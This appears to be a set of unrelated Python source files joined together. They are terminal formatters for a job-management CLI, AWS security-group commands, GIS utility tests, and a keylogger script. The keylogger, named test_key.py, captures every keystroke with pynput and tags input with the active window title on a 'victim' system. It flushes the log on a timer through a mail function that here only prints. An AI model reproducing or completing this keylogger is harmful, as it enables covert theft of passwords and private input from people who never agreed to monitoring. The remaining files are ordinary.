    def __call__(self, job_status: JobDescription) -> RenderableType:
        message = (
            f"Updated job {job_status.id} life span to "
            f"be {format_life_span(job_status.life_span)}"
        )
        ends = get_lifespan_ends(job_status)
        if ends is None:
            return message
        return message + f"\nLife span ends (approx): {self._datetime_formatter(ends)}"
def format_life_span(life_span: Optional[float]) -> str:
    """Human-readable life span: "" when unset, "no limit" for 0, else a delta."""
    if life_span is None:
        return ""
    if life_span:
        return format_timedelta(datetime.timedelta(seconds=life_span))
    return "no limit"
class JobTelemetryFormatter(RenderHook):
    """Live-updating table of per-job telemetry, redrawn in place on
    terminals via rich's render-hook mechanism."""

    def __init__(
        self,
        console: Console,
        username: str,
        sort_keys: List[Tuple[JobTelemetryKeyFunc, bool]],
        columns: JobTableFormat,
        image_formatter: ImageFormatter,
        datetime_formatter: DatetimeFormatter,
        maxrows: Optional[int] = None,
    ) -> None:
        self._console = console
        self._username = username
        self.sort_keys = sort_keys
        self._columns = columns
        self._image_formatter = image_formatter
        self._datetime_formatter = datetime_formatter
        self._maxrows = maxrows
        self._live_render = LiveRender(Table.grid())
        # job id -> (description, latest telemetry sample)
        self._data: Dict[str, Tuple[JobDescription, JobTelemetry]] = {}
        self.changed = True

    def update(self, job: JobDescription, info: JobTelemetry) -> None:
        """Record the latest telemetry sample for *job*."""
        self._data[job.id] = job, info
        self.changed = True

    def remove(self, job_id: str) -> None:
        """Forget a job (no-op if it is not tracked)."""
        self._data.pop(job_id, None)
        self.changed = True

    def render(self) -> None:
        """Rebuild the table from the current data and draw it."""
        table = Table(box=box.SIMPLE_HEAVY)
        _add_columns(table, self._columns)
        items = list(self._data.values())
        # Multi-key sort: applying keys in reverse order over a stable sort
        # yields primary-then-secondary ordering.
        for keyfunc, reverse in reversed(self.sort_keys):
            items.sort(key=keyfunc, reverse=reverse)
        # Clamp visible rows to console height (minus header chrome),
        # further limited by the optional maxrows cap.
        maxrows = self._console.size.height - 4
        if self._maxrows is not None and self._maxrows < maxrows:
            maxrows = self._maxrows
        del items[max(maxrows, 1) :]
        for job, info in items:
            job_data = TabularJobRow.from_job(
                job,
                self._username,
                image_formatter=self._image_formatter,
                datetime_formatter=self._datetime_formatter,
            )
            telemetry_data = dict(
                cpu=f"{info.cpu:.3f}",
                memory=f"{info.memory:.3f}",
                gpu=f"{info.gpu_duty_cycle}" if info.gpu_duty_cycle else "0",
                gpu_memory=f"{info.gpu_memory:.3f}" if info.gpu_memory else "0",
            )

            # Telemetry columns come from the latest sample; all other
            # columns fall back to the static job row.
            def get(id: str) -> TextType:
                if id in telemetry_data:
                    return telemetry_data[id]
                else:
                    return getattr(job_data, id)

            table.add_row(*_format_row(self._columns, get))
        if self._console.is_terminal:
            # Terminal: update in place through the live renderable.
            self._live_render.set_renderable(table)
            with self._console:
                self._console.print(Control())
        else:
            self._console.print(table)
        self.changed = False

    def process_renderables(
        self, renderables: List[ConsoleRenderable]
    ) -> List[ConsoleRenderable]:
        """Process renderables to restore cursor and display progress."""
        if self._console.is_terminal:
            renderables = [
                self._live_render.position_cursor(),
                *renderables,
                self._live_render,
            ]
        return renderables

    def __enter__(self) -> "JobTelemetryFormatter":
        self._console.show_cursor(False)
        self._console.push_render_hook(self)
        return self

    def __exit__(
        self,
        exc_type: Type[BaseException],
        exc_val: BaseException,
        exc_tb: TracebackType,
    ) -> None:
        # Restore normal console state on exit.
        self._console.line()
        self._console.show_cursor(True)
        self._console.pop_render_hook()
class BaseJobsFormatter:
    """Interface for job-list renderers.

    NOTE(review): this class does not inherit abc.ABC, so @abc.abstractmethod
    is not enforced at instantiation time — confirm whether that is intended.
    """

    @abc.abstractmethod
    def __call__(self, jobs: Iterable[JobDescription]) -> RenderableType:
        """Render *jobs* to a rich renderable."""
        pass
class SimpleJobsFormatter(BaseJobsFormatter):
    """Render jobs as a bare single-column grid of job ids."""

    def __call__(self, jobs: Iterable[JobDescription]) -> RenderableType:
        grid = Table.grid()
        grid.add_column("")
        for item in jobs:
            grid.add_row(item.id)
        return grid
@dataclass(frozen=True)
class TabularJobRow:
    """One pre-formatted row of the jobs table; every cell is display-ready."""

    id: str
    name: str
    tags: str
    status: Text
    when: str
    created: str
    started: str
    finished: str
    image: str
    owner: str
    description: str
    cluster_name: str
    org_name: str
    command: str
    life_span: str
    workdir: str
    preset: str

    @classmethod
    def from_job(
        cls,
        job: JobDescription,
        username: str,
        image_formatter: ImageFormatter,
        datetime_formatter: DatetimeFormatter,
    ) -> "TabularJobRow":
        """Build a row from a job description, formatting each field for display."""
        return cls(
            id=job.id,
            name=job.name if job.name else "",
            tags=",".join(job.tags),
            status=fmt_status(job.status),
            when=datetime_formatter(job.history.changed_at),
            created=datetime_formatter(job.history.created_at),
            started=datetime_formatter(job.history.started_at),
            finished=datetime_formatter(job.history.finished_at),
            image=image_formatter(job.container.image),
            # The current user's own jobs are abbreviated to "YOU".
            owner=("YOU" if job.owner == username else job.owner),
            description=job.description if job.description else "",
            cluster_name=job.cluster_name,
            org_name=job.org_name or "",
            command=job.container.command if job.container.command else "",
            life_span=format_life_span(job.life_span),
            workdir=job.container.working_dir or "",
            preset=job.preset_name or "",
        )

    def to_list(self, columns: JobTableFormat) -> List[TextType]:
        """Project this row onto the requested column layout."""
        return _format_row(columns, lambda id: getattr(self, id))
def _format_row(
columns: JobTableFormat, get: Callable[[str], TextType]
) -> List[TextType]:
result: List[TextType] = []
for column in columns:
if "/" in column.id:
cell: List[TextType] = []
for id in column.id.split("/"):
value = get(id)
if cell:
cell.append("\n ") # new line and indentation
if isinstance(value, Text):
value.stylize("italic")
else:
value = Text(value, style="italic")
cell.append(value)
result.append(Text.assemble(*cell))
else:
result.append(get(column.id))
return result
class TabularJobsFormatter(BaseJobsFormatter):
    """Render jobs as a rich table using a configurable column layout."""

    def __init__(
        self,
        username: str,
        columns: JobTableFormat,
        image_formatter: ImageFormatter,
        datetime_formatter: DatetimeFormatter,
    ) -> None:
        self._username = username
        self._columns = columns
        self._image_formatter = image_formatter
        self._datetime_formatter = datetime_formatter

    def __call__(self, jobs: Iterable[JobDescription]) -> RenderableType:
        table = Table(box=box.SIMPLE_HEAVY)
        _add_columns(table, self._columns)
        for job in jobs:
            row = TabularJobRow.from_job(
                job,
                self._username,
                image_formatter=self._image_formatter,
                datetime_formatter=self._datetime_formatter,
            )
            table.add_row(*row.to_list(self._columns))
        return table
class JobStartProgress:
    """Job start-up progress reporter; base class doubles as the quiet mode."""

    time_factory = staticmethod(time.monotonic)

    @classmethod
    def create(cls, console: Console, quiet: bool) -> "JobStartProgress":
        """Pick the implementation matching the requested output mode."""
        if quiet:
            return JobStartProgress()
        if console.is_terminal:
            return DetailedJobStartProgress(console)
        return StreamJobStartProgress(console)

    def begin(self, job: JobDescription) -> None:
        # Quiet mode: emit only the job id.
        print(job.id)

    def step(self, job: JobDescription) -> None:
        pass

    def end(self, job: JobDescription) -> None:
        pass

    def _get_status_reason_message(self, job: JobDescription) -> str:
        reason = job.history.reason
        if reason:
            return reason
        if job.status == JobStatus.PENDING:
            return "Initializing"
        return ""

    def _get_status_description_message(self, job: JobDescription) -> str:
        if job.history.description:
            return f"({job.history.description})"
        return ""

    def __enter__(self) -> "JobStartProgress":
        return self

    def __exit__(
        self,
        exc_type: Type[BaseException],
        exc_val: BaseException,
        exc_tb: TracebackType,
    ) -> None:
        pass
def _add_columns(table: Table, columns: JobTableFormat) -> None:
column = columns[0]
table.add_column(
column.title,
style="bold",
justify=column.justify,
width=column.width,
min_width=column.min_width,
max_width=column.max_width,
)
for column in columns[1:]:
table.add_column(
column.title,
justify=column.justify,
width=column.width,
min_width=column.min_width,
max_width=column.max_width,
)
class DetailedJobStartProgress(JobStartProgress, RenderHook):
    """Terminal start progress: animated in-place status line via rich."""

    def __init__(self, console: Console) -> None:
        self._time = self.time_factory()
        self._prev = Text("")  # last status line already printed/animated
        self._console = console
        self._spinner = SPINNER
        self._live_render = LiveRender(Text())

    def begin(self, job: JobDescription) -> None:
        # Announce job id (and name when present) once at start-up.
        self._console.print(
            f"{yes()} [b]Job ID[/b]: {rich_escape(job.id)}", markup=True
        )
        if job.name:
            self._console.print(
                f"{yes()} [b]Name[/b]: {rich_escape(job.name)}", markup=True
            )

    def step(self, job: JobDescription) -> None:
        new_time = self.time_factory()
        dt = new_time - self._time
        # Leading glyph reflects the coarse state.
        if job.status == JobStatus.PENDING:
            msg = Text("-", "yellow")
        elif job.status == JobStatus.FAILED:
            msg = Text("×", "red")
        else:
            # RUNNING or SUCCEEDED
            msg = Text("√", "green")
        msg = Text.assemble(msg, " Status: ", fmt_status(job.status))
        reason = self._get_status_reason_message(job)
        if reason:
            msg = Text.assemble(msg, " ", (reason, "b"))
        description = self._get_status_description_message(job)
        if description:
            msg = Text.assemble(msg, " " + description)
        if msg != self._prev:
            # Status changed: commit the previous line to the scrollback.
            if self._prev:
                self._console.print(self._prev)
            self._prev = msg
        else:
            # Same status: animate spinner + elapsed time in place.
            msg = Text.assemble(msg, f" {next(self._spinner)} [{dt:.1f} sec]")
        self._live_render.set_renderable(msg)
        with self._console:
            self._console.print(Control())

    def end(self, job: JobDescription) -> None:
        out = []
        if self._prev:
            # Flush the last status line and clear the live renderable.
            self._console.print(self._prev)
            empty = Text("")
            self._prev = empty
            self._live_render.set_renderable(empty)
        if job.status != JobStatus.FAILED:
            http_url = job.http_url
            if http_url:
                out.append(f"{yes()} [b]Http URL[/b]: {rich_escape(str(http_url))}")
            if job.life_span:
                limit = humanize.naturaldelta(datetime.timedelta(seconds=job.life_span))
                out.append(
                    f"{yes()} [yellow]The job will die in {limit}.[/yellow] "
                    "See --life-span option documentation for details.",
                )
        self._console.print("\n".join(out), markup=True)

    def process_renderables(
        self, renderables: List[ConsoleRenderable]
    ) -> List[ConsoleRenderable]:
        """Process renderables to restore cursor and display progress."""
        if self._console.is_terminal:
            renderables = [
                self._live_render.position_cursor(),
                *renderables,
                self._live_render,
            ]
        return renderables

    def __enter__(self) -> "JobStartProgress":
        self._console.show_cursor(False)
        self._console.push_render_hook(self)
        return self

    def __exit__(
        self,
        exc_type: Type[BaseException],
        exc_val: BaseException,
        exc_tb: TracebackType,
    ) -> None:
        # Restore normal console state.
        self._console.pop_render_hook()
        self._console.line()
        self._console.show_cursor(True)
class StreamJobStartProgress(JobStartProgress):
    """Plain-text start progress for non-terminal output (no cursor control)."""

    def __init__(self, console: Console) -> None:
        self._console = console
        self._prev = ""

    def begin(self, job: JobDescription) -> None:
        self._console.print(f"Job ID: {job.id}")
        if job.name:
            self._console.print(f"Name: {job.name}")

    def step(self, job: JobDescription) -> None:
        parts = [f"Status: {job.status}"]
        reason = self._get_status_reason_message(job)
        if reason:
            parts.append(reason)
        description = self._get_status_description_message(job)
        if description:
            parts.append(description)
        msg = " ".join(parts)
        if job.status != JobStatus.PENDING:
            msg += "\n"
        # Only print when the line actually changed, to avoid log spam.
        if msg != self._prev:
            self._console.print(msg)
            self._prev = msg

    def end(self, job: JobDescription) -> None:
        pass
class JobStopProgress:
    """Progress reporter while waiting for a job to stop; base = quiet mode."""

    TIMEOUT = 15 * 60  # seconds to wait before giving up
    time_factory = staticmethod(time.monotonic)

    @classmethod
    def create(cls, console: Console, quiet: bool) -> "JobStopProgress":
        """Pick the implementation matching the requested output mode."""
        if quiet:
            return JobStopProgress()
        if console.is_terminal:
            return DetailedJobStopProgress(console)
        return StreamJobStopProgress(console)

    def __init__(self) -> None:
        self._time = self.time_factory()

    def kill(self, job: JobDescription) -> None:
        pass

    def detach(self, job: JobDescription) -> None:
        pass

    def step(self, job: JobDescription) -> bool:
        """Tick once; return False when TIMEOUT has elapsed, True otherwise."""
        elapsed = self.time_factory() - self._time
        if elapsed > self.TIMEOUT:
            self.timeout(job)
            return False
        self.tick(job)
        return True

    def tick(self, job: JobDescription) -> None:
        pass

    def timeout(self, job: JobDescription) -> None:
        pass

    def __enter__(self) -> "JobStopProgress":
        return self

    def __exit__(
        self,
        exc_type: Type[BaseException],
        exc_val: BaseException,
        exc_tb: TracebackType,
    ) -> None:
        pass
class DetailedJobStopProgress(JobStopProgress, RenderHook):
    """Terminal stop progress: spinner line plus actionable hints."""

    def __init__(self, console: Console) -> None:
        super().__init__()
        self._console = console
        self._spinner = SPINNER
        self._live_render = LiveRender(Text())

    def _hint(self, hints: Iterable[Tuple[str, str]]) -> None:
        # Print a dimmed "title: command" list of follow-up actions.
        for title, hint in hints:
            self._console.print(f"{title}:", style="dim yellow")
            self._console.print(f"  {hint}", style="dim")

    def detach(self, job: JobDescription) -> None:
        self._console.line()
        self._console.print(
            f"{no()} [red]Terminal was detached but job is still running", markup=True
        )
        self._hint(
            [
                ("Re-attach to job", f"neuro attach {job.id}"),
                ("Check job status", f"neuro status {job.id}"),
                ("Kill job", f"neuro kill {job.id}"),
                ("Fetch job logs", f"neuro logs {job.id}"),
            ]
        )

    def kill(self, job: JobDescription) -> None:
        self._console.line()
        self._console.print(f"{no()} [red]Job was killed", markup=True)
        self._hint(
            [
                ("Get job status", f"neuro status {job.id}"),
                ("Fetch job logs", f"neuro logs {job.id}"),
            ]
        )

    def tick(self, job: JobDescription) -> None:
        new_time = self.time_factory()
        dt = new_time - self._time
        if job.status == JobStatus.RUNNING:
            # Still stopping: animate spinner + elapsed time.
            msg = (
                "[yellow]-[/yellow]"
                + f" Wait for stop {next(self._spinner)} [{dt:.1f} sec]"
            )
        else:
            msg = yes() + f" Job [b]{job.id}[/b] stopped"
        self._live_render.set_renderable(Text.from_markup(msg))
        with self._console:
            self._console.print(Control())

    def timeout(self, job: JobDescription) -> None:
        self._console.line()
        self._console.print("[red]× Warning !!!", markup=True)
        self._console.print(
            f"{no()} [red]"
            "The attached session was disconnected but the job is still alive.",
            markup=True,
        )
        self._hint(
            [
                ("Reconnect to the job", f"neuro attach {job.id}"),
                ("Terminate the job", f"neuro kill {job.id}"),
            ]
        )

    def process_renderables(
        self, renderables: List[ConsoleRenderable]
    ) -> List[ConsoleRenderable]:
        """Process renderables to restore cursor and display progress."""
        if self._console.is_terminal:
            renderables = [
                self._live_render.position_cursor(),
                *renderables,
                self._live_render,
            ]
        return renderables

    def __enter__(self) -> "JobStopProgress":
        self._console.show_cursor(False)
        self._console.push_render_hook(self)
        return self

    def __exit__(
        self,
        exc_type: Type[BaseException],
        exc_val: BaseException,
        exc_tb: TracebackType,
    ) -> None:
        # Restore normal console state.
        self._console.pop_render_hook()
        self._console.line()
        self._console.show_cursor(True)
class StreamJobStopProgress(JobStopProgress):
    """Plain-text stop progress for non-terminal output."""

    def __init__(self, console: Console) -> None:
        super().__init__()
        self._console = console
        # Announce once; no per-tick output in stream mode.
        self._console.print("Wait for stopping")

    def detach(self, job: JobDescription) -> None:
        pass

    def kill(self, job: JobDescription) -> None:
        self._console.print("Job was killed")

    def tick(self, job: JobDescription) -> None:
        pass

    def timeout(self, job: JobDescription) -> None:
        self._console.print("")
        self._console.print("Warning !!!")
        self._console.print(
            "The attached session was disconnected but the job is still alive."
        )
class ExecStopProgress:
    """Progress reporter while waiting for an exec'd process to stop."""

    TIMEOUT = 15  # seconds to wait before giving up
    time_factory = staticmethod(time.monotonic)

    @classmethod
    def create(cls, console: Console, quiet: bool, job_id: str) -> "ExecStopProgress":
        """Pick the implementation matching the requested output mode."""
        if quiet:
            return ExecStopProgress(job_id)
        if console.is_terminal:
            return DetailedExecStopProgress(console, job_id)
        return StreamExecStopProgress(console, job_id)

    def __init__(self, job_id: str) -> None:
        self._time = self.time_factory()
        self._job_id = job_id

    def __call__(self, running: bool) -> bool:
        """Tick once; return False when TIMEOUT has elapsed, True otherwise."""
        if self.time_factory() - self._time > self.TIMEOUT:
            self.timeout()
            return False
        self.tick(running)
        return True

    def tick(self, running: bool) -> None:
        pass

    def timeout(self) -> None:
        pass

    def __enter__(self) -> "ExecStopProgress":
        return self

    def __exit__(
        self,
        exc_type: Type[BaseException],
        exc_val: BaseException,
        exc_tb: TracebackType,
    ) -> None:
        pass
class DetailedExecStopProgress(ExecStopProgress, RenderHook):
    """Terminal exec-stop progress: animated in-place wait line."""

    def __init__(self, console: Console, job_id: str) -> None:
        super().__init__(job_id)
        self._console = console
        self._spinner = SPINNER
        self._live_render = LiveRender(Text())

    def tick(self, running: bool) -> None:
        new_time = self.time_factory()
        dt = new_time - self._time
        if running:
            # NOTE(review): sibling classes put a space before "Wait";
            # here it is missing ("[/yellow]Wait...") — confirm intent.
            msg = (
                "[yellow]-[/yellow]"
                + f"Wait for stopping {next(self._spinner)} [{dt:.1f} sec]"
            )
        else:
            msg = yes() + f" Job [b]{self._job_id}[/b] stopped"
        self._live_render.set_renderable(Text.from_markup(msg))
        with self._console:
            self._console.print(Control())

    def timeout(self) -> None:
        self._console.line()
        self._console.print(f"{no()} [red]Warning !!!", markup=True)
        self._console.print(
            f"{no()} [red]The attached session was disconnected "
            "but the exec process is still alive.",
            markup=True,
        )

    def process_renderables(
        self, renderables: List[ConsoleRenderable]
    ) -> List[ConsoleRenderable]:
        """Process renderables to restore cursor and display progress."""
        if self._console.is_terminal:
            renderables = [
                self._live_render.position_cursor(),
                *renderables,
                self._live_render,
            ]
        return renderables

    def __enter__(self) -> "ExecStopProgress":
        self._console.show_cursor(False)
        self._console.push_render_hook(self)
        return self

    def __exit__(
        self,
        exc_type: Type[BaseException],
        exc_val: BaseException,
        exc_tb: TracebackType,
    ) -> None:
        # NOTE(review): order differs from the other progress classes, which
        # pop the render hook first — confirm this is intentional.
        self._console.line()
        self._console.show_cursor(True)
        self._console.pop_render_hook()
class StreamExecStopProgress(ExecStopProgress):
    """Plain-text exec-stop progress for non-terminal output."""

    def __init__(self, console: Console, job_id: str) -> None:
        super().__init__(job_id)
        self._console = console
        # Announce once; no per-tick output in stream mode.
        self._console.print("Wait for stopping")

    def tick(self, running: bool) -> None:
        pass

    def timeout(self) -> None:
        self._console.print()
        self._console.print("Warning !!!")
        self._console.print(
            "The attached session was disconnected "
            "but the exec process is still alive."
        )
|
# -*- coding: utf-8 -*-
"""Commands for managing security groups."""
import click
from ...jobs import securitygroups as sg_jobs
from ...jobs.exceptions import AwsError
from ...jobs.exceptions import MissingKey
from ...jobs.exceptions import Non200Response
from ...jobs.exceptions import PermissionDenied
from ...jobs.exceptions import ResourceAlreadyExists
from ...jobs.exceptions import ResourceDoesNotExist
from ...jobs.exceptions import ResourceNotCreated
from ...jobs.exceptions import ResourceNotDeleted
from .. import utils
@click.group()
def securitygroups():
    """Manage security groups."""
    # Pure command container: the list/create/delete subcommands below
    # attach to this group; the group body itself does nothing.
    pass
@securitygroups.command(name="list")
@click.option(
"--profile",
help="An AWS profile to connect with.")
@click.option(
"--access-key-id",
help="An AWS access key ID.")
@click.option(
"--access-key-secret",
help="An AWS access key secret.")
def list_security_groups(
profile=None,
access_key_id=None,
access_key_secret=None):
"""List security groups."""
aws_profile = utils.get_profile(profile, access_key_id, access_key_secret)
try:
security_groups = sg_jobs.fetch_all(aws_profile)
except PermissionDenied:
msg = "You don't have permission to view security groups."
raise click.ClickException(msg)
except (MissingKey, Non200Response) as error:
raise click.ClickException(str(error))
except AwsError as error:
raise click.ClickException(str(error))
if security_groups:
for security_group in security_groups:
display_name = sg_jobs.get_display_name(security_group)
click.echo(display_name)
@securitygroups.command(name="create")
@click.argument("name")
@click.option(
"--vpc",
help="A VPC name (or ID).")
@click.option(
"--tag",
multiple=True,
help="KEY:VALUE tag for the security group.")
@click.option(
"--profile",
help="An AWS profile to connect with.")
@click.option(
"--access-key-id",
help="An AWS access key ID.")
@click.option(
"--access-key-secret",
help="An AWS access key secret.")
def create_security_group(
name,
vpc=None,
tag=None,
profile=None,
access_key_id=None,
access_key_secret=None):
"""Create security groups."""
aws_profile = utils.get_profile(profile, access_key_id, access_key_secret)
tags = None
if tag:
tags = utils.parse_tags(tag)
try:
security_groups = sg_jobs.create(aws_profile, name, vpc, tags)
except PermissionDenied:
msg = "You don't have permission to create security groups."
raise click.ClickException(msg)
except (MissingKey, Non200Response) as error:
raise click.ClickException(str(error))
except AwsError as error:
raise click.ClickException(str(error))
except (ResourceDoesNotExist, ResourceAlreadyExists, ResourceNotCreated) as error:
raise click.ClickException(str(error))
if security_groups:
for security_group in security_groups:
display_name = sg_jobs.get_display_name(security_group)
click.echo(display_name)
@securitygroups.command(name="delete")
@click.argument("name")
@click.option(
"--profile",
help="An AWS profile to connect with.")
@click.option(
"--access-key-id",
help="An AWS access key ID.")
@click.option(
"--access-key-secret",
help="An AWS access key secret.")
def delete_security_group(
name,
profile=None,
access_key_id=None,
access_key_secret=None):
"""Delete security groups."""
aws_profile = utils.get_profile(profile, access_key_id, access_key_secret)
try:
security_groups = sg_jobs.delete(aws_profile, name)
except PermissionDenied:
msg = "You don't have permission to delete security groups."
raise click.ClickException(msg)
except (MissingKey, Non200Response) as error:
raise click.ClickException(str(error))
except AwsError as error:
raise click.ClickException(str(error))
except (ResourceDoesNotExist, ResourceNotDeleted) as error:
raise click.ClickException(str(error))
|
<reponame>krasnova19/technowlogger<filename>TestKeylogger/test_key.py
import pynput.keyboard, threading, platform
try:
import win32gui as w
except Exception:
pass
log = ""
interval = 10
victim_system = platform.system()
lastWindow = ""
def append_to_log(string):
    """Append *string* to the module-level keystroke buffer."""
    global log
    log = log + string
def process_key_press(key):
    """pynput on_press callback: translate *key* to text and buffer it.

    On Windows, a change of foreground window is recorded as a header line
    before the keystroke. Printable keys use ``key.char``; special keys
    (which have no ``char`` and raise AttributeError) are mapped to bracketed
    tokens; anything unmapped falls through to ``str(key)``.
    """
    global lastWindow
    current_key = ""
    if victim_system == 'Windows':
        try:
            CurrentWindowName = w.GetWindowText(w.GetForegroundWindow())
            if lastWindow != CurrentWindowName:
                lastWindow = CurrentWindowName
                current_key = f"\n\n[OnWard Data Entered In : {CurrentWindowName}]\n"
        except Exception as e:
            print(f"[!] Failed to Execute \"Log Data Distinguisher Function\" Error: {e} ")
    try:
        # Printable keys expose .char; special keys raise AttributeError.
        current_key += str(key.char)
    except AttributeError:
        if key == key.space:
            current_key += " "
        elif key == key.enter:
            current_key += " [ENTER] "
        elif key == key.backspace:
            current_key += " [BACKSPACE] "
        elif key == key.ctrl_l or key == key.ctrl_r:
            current_key += " [CTRL] "
        elif key == key.shift or key == key.shift_r:
            current_key += " [SHIFT] "
        elif key == key.delete:
            current_key += " [DELETE] "
        elif key == key.esc:
            current_key += " [ESC] "
        elif key == key.tab:
            current_key += " [TAB] "
        elif key == key.up:
            current_key += " [UP] "
        elif key == key.down:
            current_key += " [DOWN] "
        elif key == key.left:
            current_key += " [LEFT] "
        elif key == key.right:
            current_key += " [RIGHT] "
        elif key == key.cmd or key == key.cmd_r:
            current_key += " [WINDOWS-KEY] "
        elif key == key.f1:
            current_key += " [F1] "
        elif key == key.f2:
            current_key += " [F2] "
        elif key == key.f3:
            current_key += " [F3] "
        elif key == key.f4:
            current_key += " [F4] "
        elif key == key.f5:
            current_key += " [F5] "
        elif key == key.f6:
            current_key += " [F6] "
        elif key == key.f7:
            current_key += " [F7] "
        elif key == key.f8:
            current_key += " [F8] "
        elif key == key.f9:
            current_key += " [F9] "
        elif key == key.f10:
            current_key += " [F10] "
        elif key == key.f11:
            current_key += " [F11] "
        elif key == key.f12:
            current_key += " [F12] "
        elif key == key.alt_l or key == key.alt_r:
            current_key += " [ALT] "
        elif key == key.caps_lock:
            current_key += " [CAPSLOCK] "
        elif key == key.home:
            current_key += " [HOME] "
        else:
            # Fallback for any key without an explicit mapping above.
            current_key += " " + str(key) + " "
    append_to_log(current_key)
def send_mail():
    """Delivery hook for the buffered log; this test stub only prints it."""
    print(log)
def report():
    """Flush the buffer via send_mail(), clear it, and re-arm the timer.

    Re-schedules itself with threading.Timer, so a new timer thread is
    created on every flush (every `interval` seconds).
    """
    global log
    send_mail()
    log = ""
    timer = threading.Timer(interval, report)
    timer.start()
# Start the key listener and kick off the periodic reporting loop; join()
# blocks the main thread until the listener stops.
keyboard_listener = pynput.keyboard.Listener(on_press=process_key_press)
with keyboard_listener:
    report()
    keyboard_listener.join()
import unittest
import json
import os
import sys
sys.path.append('../')
from tasks.utils import task_utils
class TestTaskUtils(unittest.TestCase):
    """Test case for testing the processing task utility functions.

    NOTE(review): these tests depend on a local Solr instance
    (localhost:8888), a sample ArcGIS Online service, local test data,
    and (in one test) arcpy — they are integration tests, not unit tests.
    """

    @classmethod
    def setUpClass(self):
        # NOTE(review): by convention the classmethod parameter should be
        # named `cls`, not `self`; behavior is unaffected.
        # Solr field list appended to every query built by these tests.
        self.fl = '&fl=id,name:[name],format,path,fullpath:[absolute],absolute_path:[absolute],[thumbURL],[lyrFile],[lyrURL],[downloadURL],[lyrURL]'
        self.query = 'http://localhost:8888/solr/v0/select?&wt=json{0}'.format(self.fl)
        self.items = None
        # Canned request payload used to drive the parameter-parsing helpers.
        with open(os.path.join(os.getcwd(), 'test_utils.json')) as data_file:
            self.request = json.load(data_file)
        self.parameters = self.request['params']
        self.result_count, self.response_index = task_utils.get_result_count(self.parameters)
        self.qi = task_utils.QueryIndex(self.parameters[self.response_index])
        self.fq = self.qi.get_fq()
        self.query += self.fq
        # Live ArcGIS sample service used by the service-layer tests.
        self.service_layer = task_utils.ServiceLayer("http://sampleserver1.arcgisonline.com/ArcGIS/rest/services/PublicSafety/PublicSafetyOperationalLayers/MapServer/5")
        self.layer_files = '../supportfiles/basemaps'
        self.mxd_template = '../supportfiles/MapTemplate.mxd'

    @classmethod
    def tearDownClass(self):
        # Nothing to clean up; fixtures are read-only.
        pass

    def test_result_count(self):
        """Tests the number of requests"""
        self.assertEqual(self.result_count, 119)

    def test_query_string(self):
        """Tests getting the query string from the request"""
        expected = 'http://localhost:8888/solr/v0/select?&wt=json&fl=id,name:[name],format,path,fullpath:[absolute],absolute_path:[absolute],[thumbURL],[lyrFile],[lyrURL],[downloadURL],[lyrURL]&fq=location:baad8134e9644fc7&q=id:(25107622%20T14C47A34AF9_states_1%20T14C47A34AF9_states_8%20de71138aeb803dae%20df08413d8acdaba2%208fc582b9845105f8%202510bce8e885b1dc_0003%203adbb78602e5df2b%20726262e2a1b25862_0000%20a3fbb3a1f9ed41f8be16abc384673372),usa'
        self.assertEqual(self.query, expected)

    def test_get_items(self):
        """Tests the get_items and get_data_path functions"""
        self.items = task_utils.get_input_items([{'path': os.path.join(os.getcwd(), 'test-data', 'usstates.shp'), 'name': 'USStates'},
                                                 {'path': os.path.join(os.getcwd(), 'test-data', 'USA.mxd'), 'name': 'USA'},
                                                 {'path': '', 'absolute_path': '', '[lyrFile]': os.path.join(os.getcwd(), 'test-data', 'Cities.lyr'), 'name': 'Cities', 'format': ''}])
        # NOTE(review): expected keys use '\\' separators — Windows-only.
        expected_items = {'{0}\\test-data\\usstates.shp'.format(os.getcwd()): 'USStates',
                          '{0}\\test-data\\USA.mxd'.format(os.getcwd()): 'USA',
                          '{0}\\test-data\\Cities.lyr'.format(os.getcwd()): 'Cities'}
        self.assertDictEqual(expected_items, self.items)

    def test_list_files(self):
        """Tests get the list of component files"""
        shp_files = ('shp', 'shx', 'sbn', 'dbf', 'prj', 'cpg', 'shp.xml', 'dbf.xml')
        files = task_utils.list_files(os.path.join(os.getcwd(), 'test-data', 'usstates.shp'), shp_files)
        expected_files = ['{0}\\test-data\\usstates.shp'.format(os.getcwd()),
                          '{0}\\test-data\\usstates.shx'.format(os.getcwd()),
                          '{0}\\test-data\\usstates.sbn'.format(os.getcwd()),
                          '{0}\\test-data\\usstates.dbf'.format(os.getcwd()),
                          '{0}\\test-data\\usstates.prj'.format(os.getcwd()),
                          '{0}\\test-data\\usstates.cpg'.format(os.getcwd()),
                          '{0}\\test-data\\usstates.shp.xml'.format(os.getcwd())]
        # NOTE(review): assertItemsEqual is Python 2 only; under Python 3 the
        # equivalent is assertCountEqual — confirm target interpreter.
        self.assertItemsEqual(expected_files, files)

    def test_get_increment(self):
        """Test gettig a suitable base 10 increment"""
        increment = task_utils.get_increment(43567)
        self.assertEqual(increment, 1000)

    def test_data_frame_name(self):
        """Test getting a map docmment data frame name without a layer name in the path"""
        expected_name = task_utils.get_data_frame_name(r"C:\GISData\mxds\USRivers.mxd | Layers").strip()
        self.assertEqual(expected_name, "Layers")

    def test_data_frame_name_with_layer(self):
        """Test getting a map docmment data frame name with a layer name in the path"""
        name = task_utils.get_data_frame_name('C:\GISData\mxds\USRivers.mxd | Layers\Rivers')
        self.assertEqual(name, 'Layers')

    def test_service_layer_wkid(self):
        """Test getting the service layer WKID"""
        wkt = self.service_layer.wkid
        expected_wkt = 4326
        self.assertEqual(expected_wkt, wkt)

    def test_service_layer_objectids(self):
        """Test get the service layer objectids"""
        ids = self.service_layer.object_ids
        # object_ids is a sequence of groups; count members across groups.
        id_count = sum([len(group) for group in ids])
        expected_count = 100
        self.assertEqual(expected_count, id_count)

    def test_service_layer_oid_field_name(self):
        """Test getting the service lyaer object id field"""
        oid_field_name = self.service_layer.oid_field_name
        expected_name = "OBJECTID"
        self.assertEqual(expected_name, oid_field_name)

    def test_grouper(self):
        """Test grouping a list into chunks"""
        groups = task_utils.grouper(range(0, self.result_count), task_utils.CHUNK_SIZE, '')
        self.assertEqual(len(list(groups)), 5)

    def test_get_parameter_value(self):
        """Test to get a tasks parameter value"""
        param_value = task_utils.get_parameter_value(self.parameters, 'output_format')
        self.assertEqual(param_value, 'SHP')

    def test_get_geodatabase_path(self):
        """Test get geodatabase path with no feature dataset"""
        gdb_path = task_utils.get_geodatabase_path(r'c:\testdata\gdb1.gdb\tablename')
        self.assertEqual(gdb_path, r'c:\testdata\gdb1.gdb')

    def test_get_geodatabase_path_fds(self):
        """Test get geodatabase path with a feature dataset"""
